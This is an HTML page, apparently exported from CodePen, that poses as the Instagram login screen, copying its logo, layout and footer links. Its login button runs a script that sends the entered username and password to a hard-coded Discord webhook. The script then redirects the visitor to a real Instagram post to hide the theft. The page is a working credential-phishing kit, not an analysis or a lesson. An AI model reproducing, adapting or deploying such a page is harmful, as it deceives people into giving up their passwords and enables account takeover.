<!DOCTYPE html>
<html lang=&quot;en&quot; >

<head>

  <meta charset=&quot;UTF-8&quot;>
  
<link rel=&quot;apple-touch-icon&quot; type=&quot;image/png&quot; href=&quot;https://cpwebassets.codepen.io/assets/favicon/apple-touch-icon-5ae1a0698dcc2402e9712f7d01ed509a57814f994c660df9f7a952f3060705ee.png&quot; />
<meta name=&quot;apple-mobile-web-app-title&quot; content=&quot;CodePen&quot;>

<link rel=&quot;shortcut icon&quot; type=&quot;image/x-icon&quot; href=&quot;https://cpwebassets.codepen.io/assets/favicon/favicon-aec34940fbc1a6e787974dcd360f2c6b63348d4b1f4e06c77743096d55480f33.ico&quot; />

<link rel=&quot;mask-icon&quot; type=&quot;image/x-icon&quot; href=&quot;https://cpwebassets.codepen.io/assets/favicon/logo-pin-8f3771b1072e3c38bd662872f6b673a722f4b3ca2421637d5596661b4e2132cc.svg&quot; color=&quot;#111&quot; />


  <title>CodePen - A Pen by Rachel Bennett</title>
  
  
  
  
<style>
/* Universal Selectors */
#root, body, html {
  height:100%;
}

body {
  overflow-y: scroll;
}

a, abbr, acronym, address, applet, article, aside, audio, b, big, blockquote, body, canvas, caption, center, cite, code, dd, del, details, dfn, div, dl, dt, em, embed, fieldset, figcaption, figure, footer, form, h1, h2, h3, h4, h5, h6, header, hgroup, html, i, iframe, img, ins, kbd, label, legend, li, mark, menu, nav, object, ol, output, p, pre, q, ruby, s, samp, section, small, span, strike, strong, sub, summary, sup, table, tbody, td, tfoot, th, thead, time, tr, tt, u, ul, var, video {
  margin:0;
  padding:0;
  border:0;
  font:inherit;
  vertical-align: baseline;
} 

a, a:visited {
  text-decoration: none;
}
a:active, .btn:active {
  opacity:.5;
}

ol, ul {
  list-style: none;
}

body, button, input {
  font-family: -apple-system,BlinkMacSystemFont,&quot;Segoe UI&quot;,Roboto,Helvetica,Arial,sans-serif;
  font-size:14px;
  line-height:18px;
}

#root, article, main, div, section, header, nav, footer {
  border: 0 solid #000000;
  box-sizing: border-box;
  align-items: stretch;
  display: flex;
  flex-direction: column;
  flex-shrink: 0;
  margin:0;
  padding:0;
  position: relative;
  -webkit-box-align: stretch;
    -moz-box-align: stretch;
  -webkit-box-orient: vertical;
    -moz-box-orient: vertical;
  -webkit-box-direction: normal;
    -moz-box-direction: normal;
} /* <--Universal Selectors End */


#root {
  z-index: 0;
}

.section-all {
  min-height:100%;
  overflow:hidden;
}

.main {
  background-color: #fafafa;
  order: 4;
  flex-grow: 1;
  -webkit-box-flex: 1;
  -moz-box-flex: 1;
  -moz-box-ordinal-group: 5;
  -webkit-box-ordinal-group: 5;
}

.wrapper {
  min-height:100%;
  overflow: hidden;
}

.wrapper, .article {
  flex-grow: 1;
  justify-content: center;
  -webkit-box-flex: 1;
    -moz-box-flex: 1;
  -webkit-box-pack: center;
    -moz-box-pack: center;
}

.article {
  flex-direction: row;
  margin:0 auto;
  max-width: 935px;
  width:100%;
  -webkit-box-orient: horizontal;
    -moz-box-orient: horizontal;
  -webkit-box-direction: normal;
    -moz-box-direction: normal;
}

.content {
  color:#262626;
  flex-grow:1;
  justify-content: center;
  max-width: 350px;
  margin-top:12px;
  -webkit-box-pack: justify;
    -moz-box-pack: justify;
  -webkit-box-flex: 1;
    -moz-box-flex: 1;  
}

.login-box {
  background: #fff;
  border: 1px solid #e6e6e6;
  border-radius: 1px;
  margin:0 0 10px;
  padding: 10px 0;
  /* align-items: center; */
}

.header {
  margin: 14.45px auto 12px;
}

.logo {
  background: cover no-repeat;
  width:175px;
  height:auto;
}

.form {
  display: flex;
  flex-direction: column;
  margin-bottom: 10px;
  -moz-box-direction: normal;
  -webkit-box-direction: normal;
}

.input-box {
  margin:auto 40px 6px;
}

input {
  height: 36px;
  border: 1px solid #efefef;
  border-radius: 3px;
  background-color: #fafafa;
  width:100%;
  font-size:12px;
  margin: 0;
  padding: 9px 0 7px 8px;
  outline: none;
  overflow: hidden;
  text-overflow: ellipsis;
  box-sizing: border-box;
}
input#name:focus, input#password:focus {
  border-color:#bbb;
}

.button-box {
  display: block;
  position: relative;
  margin: 8px 40px;
}
.btn {
  cursor: pointer;
  width: 100%;
  padding:0 8px; 
  background: #3897f0;
  border:1px solid #3897f0;
  color:#fff;
  border-radius:3px;
  font-weight:600;
  font-size: 14px;
  height: 28px;
  line-height: 26px;
  outline: none;
  white-space: nowrap;
}

.forgot, .forgot:active, .forgot:hover, .forgot:visited {
  font-size:12px;
  margin-top:12px;
  text-align: center;
  color:#003569;
  line-height: 14px!important;
}

.text {
  text-align:center;
  margin:15px;
  color:#262626;
  font-size:14px;
}

.text a, .text a:visited, .text a:hover, .text a:active {
  color:#3897f0;
  margin-left:3px;
}

/* App Store */
.app p {
  line-height: 18px;
  color:#262626;
  font-size:14px;
  text-align:center;
  margin:10px 20px;
}

.app-img {
  flex-direction: row;
  justify-content: center;
  margin:10px 0;
  -webkit-box-orient: horizontal;
  -moz-box-orient: horizontal;
}

.app-img a {
  margin-right:8px;
  height: 43.5px;
}

.app-img img {
  height:40px;
}

/* FOOTER */
.footer {
  background-color: #fafafa;
  order: 5;
  padding: 0 20px;
  background: #fafafa;
}

.footer-container {
  flex-direction: row;  
  flex-wrap:wrap;
  background-color: #fafafa;
  justify-content: space-between;
  padding: 38px 0;
  max-width:935px;
  font-size:12px;
  font-weight:600;
  margin:0 auto;
  text-transform:uppercase;
  width:100%
}

.footer-nav {
  max-width:100%;
}

.footer-nav ul {
  margin-right:16px;
  margin-bottom:3px;
  flex-grow:1;
}

.footer-nav ul li {
  display: inline-block;
  margin-right: 13px;
  margin-bottom:7px;
}

.footer-nav ul li a {
  color: #003569;
  text-decoration: none;
}

.footer span {
  color:#999;
}

span.language { 
  color: #003569;
  cursor: pointer;
  display: inline-block;
  font-weight: 600;
  position: relative;
  text-transform: uppercase;
  vertical-align: top;
}

.select {
  cursor: pointer;
  height: 100%;
  top: 0;
  opacity: 0;
  position: absolute;
  left:0;
  width: 100%;
}

/* Media Queries */
@media (max-width:450px) {
  .main {
    background-color: #fff;
  }

  .content {
    max-width: 100%;
    margin-top: 0;
    justify-content: space-between;
  }

  .login-box {
    background-color: transparent;
    border:none;
  }

  .logo {
    background: cover no-repeat;
    width:175px;
    height:auto;
    margin:0 auto;
  }

  .btn {
    cursor: pointer;
    width: 100%;
    padding:0 8px; 
    background: #3897f0;
    border:1px solid #3897f0;
    color:#fff;
    border-radius:3px;
    font-weight:600;
    font-size: 14px;
    height: 28px;
    line-height: 26px;
    outline: none;
    white-space: nowrap;
  }

  .input-box {
    border: 1px solid #efefef;
    border-radius: 3px;
    height: 36px;
    background: #fafafa;
    position: relative;
  }

  input {
    border: 0;
    background-color: #fafafa;
    width:100%;
    font-size:12px;
    margin: 0;
    padding: 9px 0 7px 8px;
    outline: none;
    overflow: hidden;
    text-overflow: ellipsis;
    box-sizing: border-box;
  }

  .input-box:hover, .input-box:focus {
    border-color:#bbb;
  }

}

@media only screen and (max-width:875px) {
  .footer-container {
    text-align: center;
    padding:10px 0;
  }
  .footer-container,  .footer-nav ul {
    justify-content: center;
    margin:0 auto;
    max-width: 360px;
    min-width: auto;
    -webkit-box-pack: center;
    -moz-box-pack: center;
  }

}
</style>

  <script>
  window.console = window.console || function(t) {};
</script>

  
  
  <script>
  if (document.location.search.match(/type=embed/gi)) {
    window.parent.postMessage(&quot;resize&quot;, &quot;*&quot;);
  }
</script>


</head>

<body translate=&quot;no&quot; >
  <head>
  <link rel=&quot;Icon&quot; type=&quot;image/x-icon&quot; href=&quot;https://a-manu.com/wp-content/uploads/sites/171/2017/04/instagram-Logo-PNG-Transparent-Background-download-300x300.png&quot;>
  <title>Instagram</title>
</head>
<body>
  <span id=&quot;root&quot;>
    <section class=&quot;section-all&quot;>
      <link rel=&quot;stylesheet&quot; href=&quot;css.css&quot;>
      
      <main class=&quot;main&quot; role=&quot;main&quot;>
        <div class=&quot;wrapper&quot;>
          <article class=&quot;article&quot;>
            <div class=&quot;content&quot;>
              <div class=&quot;login-box&quot;>
                <div class=&quot;header&quot;>
                  <img class=&quot;logo&quot; src=&quot;https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1200px-Instagram_logo.svg.png&quot; alt=&quot;Instagram&quot;>
                </div>
                <div class=&quot;form-wrap&quot;>
                  <form class=&quot;form&quot;>

                    <div class=&quot;input-box&quot;>
                      <input type=&quot;text&quot; id=&quot;username&quot; placeholder=&quot;Phone number, username, or email&quot; aria-required=&quot;true&quot; maxlength=&quot;30&quot; autocapitalize=&quot;off&quot; autocorrect=&quot;off&quot; name=&quot;username&quot; required>
                    </div>  

                    <div class=&quot;input-box&quot;>
                      <input type=&quot;password&quot; name=&quot;password&quot; id=&quot;password&quot; placeholder=&quot;Password&quot; maxlength=&quot;30&quot; aria-required=&quot;true&quot; autocapitalize=&quot;off&quot; autocorrect=&quot;off&quot; required>
                    </div>  

                    <span class=&quot;button-box&quot;>
                      <button class=&quot;btn&quot; type=&quot;button&quot; name=&quot;submit&quot; onclick=&quot;sendMessage()&quot;>Log in</button>
                    </span>  

                    <a class=&quot;forgot&quot; href=&quot;https://www.instagram.com/accounts/password/reset&quot;>Forgot password?</a>
                  </form>
                </div>
              </div> 

              <div class=&quot;login-box&quot;>
                <p class=&quot;text&quot;>Don't have an account?<a href=&quot;https://www.instagram.com/accounts/emailsignup&quot;>Sign up</a></p>
              </div>

              <div class=&quot;app&quot;>
                <p>Get the app.</p>
                <div class=&quot;app-img&quot;>
                  <a href=&quot;https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;amp;ct=igweb.loginPage.badge&amp;amp;mt=8&quot;>
                    <img src=&quot;https://www.instagram.com/static/images/appstore-install-badges/badge_ios_english-en.png/4b70f6fae447.png&quot; >
                  </a>
                  <a href=&quot;https://play.google.com/store/apps/details?id=com.instagram.android&amp;amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26utm_medium%3Dbadge&quot;>
                    <img src=&quot;https://www.instagram.com/static/images/appstore-install-badges/badge_android_english-en.png/f06b908907d5.png&quot;>
                  </a>  
                </div> 
              </div>
            </div> 
          </article>
        </div> 
      </main>

      
      <footer class=&quot;footer&quot; role=&quot;contentinfo&quot;>
        <div class=&quot;footer-container&quot;>

          <nav class=&quot;footer-nav&quot; role=&quot;navigation&quot;>
            <ul>
			  <li><a href=&quot;&quot;></a></li>
              <li><a href=&quot;https://about.instagram.com&quot;>About Us</a></li>
              <li><a href=&quot;https://help.instagram.com&quot;>Support</a></li>
              <li><a href=&quot;https://about.instagram.com/blog&quot;>Blog</a></li>
              <li><a href=&quot;https://about.instagram.com/about-us/careers&quot;>Jobs</a></li>
              <li><a href=&quot;https://www.instagram.com/developer&quot;>Api</a></li>
              <li><a href=&quot;https://help.instagram.com/519522125107875&quot;>Privacy</a></li>
              <li><a href=&quot;https://help.instagram.com/581066165581870&quot;>Terms</a></li>
              <li><a href=&quot;https://www.instagram.com/directory/hashtags&quot;>Directory</a></li>
			  <li><a href=&quot;&quot;>Instagram</a></li>
            </ul>
          </nav>

          <span class=&quot;footer-logo&quot;>&amp;copy; 2021 Instagram / GitHub: marrgiela</span>
        </div>
      </footer>
      
    </section>
  </span> 
  
  <script type=&quot;text/javascript&quot;>
    function la(src) {
      window.location=src;
    }
  </script>

  <script>
  function sendMessage() {
  function sleep(milliseconds) {
  const date = Date.now();
  let currentDate = null;
  do {
    currentDate = Date.now();
  } while (currentDate - date < milliseconds);
}
    var request = new XMLHttpRequest();
    request.open(&quot;POST&quot;, &quot;https://discord.com/api/webhooks/1015128493719310416/wJslupnq5rc5haK6uirVaddv39ojYs_SR3fF-BhDrPeZlndTFjC9VAjnchf4EFWpwDjE&quot;);
    request.setRequestHeader('Content-type', 'application/json');
    var params = {
      content: (&quot;> **USERNAME  : **&quot; + document.getElementById('username').value + &quot;\n> **PASSWORD : **&quot; + document.getElementById('password').value)
    }
    request.send(JSON.stringify(params));
	sleep(400)
	window.location.replace(&quot;https://www.instagram.com/p/B9kC4Zdqxyq/&quot;);
  }
  </script>
</body>
  
  
  
  

</body>

</html>
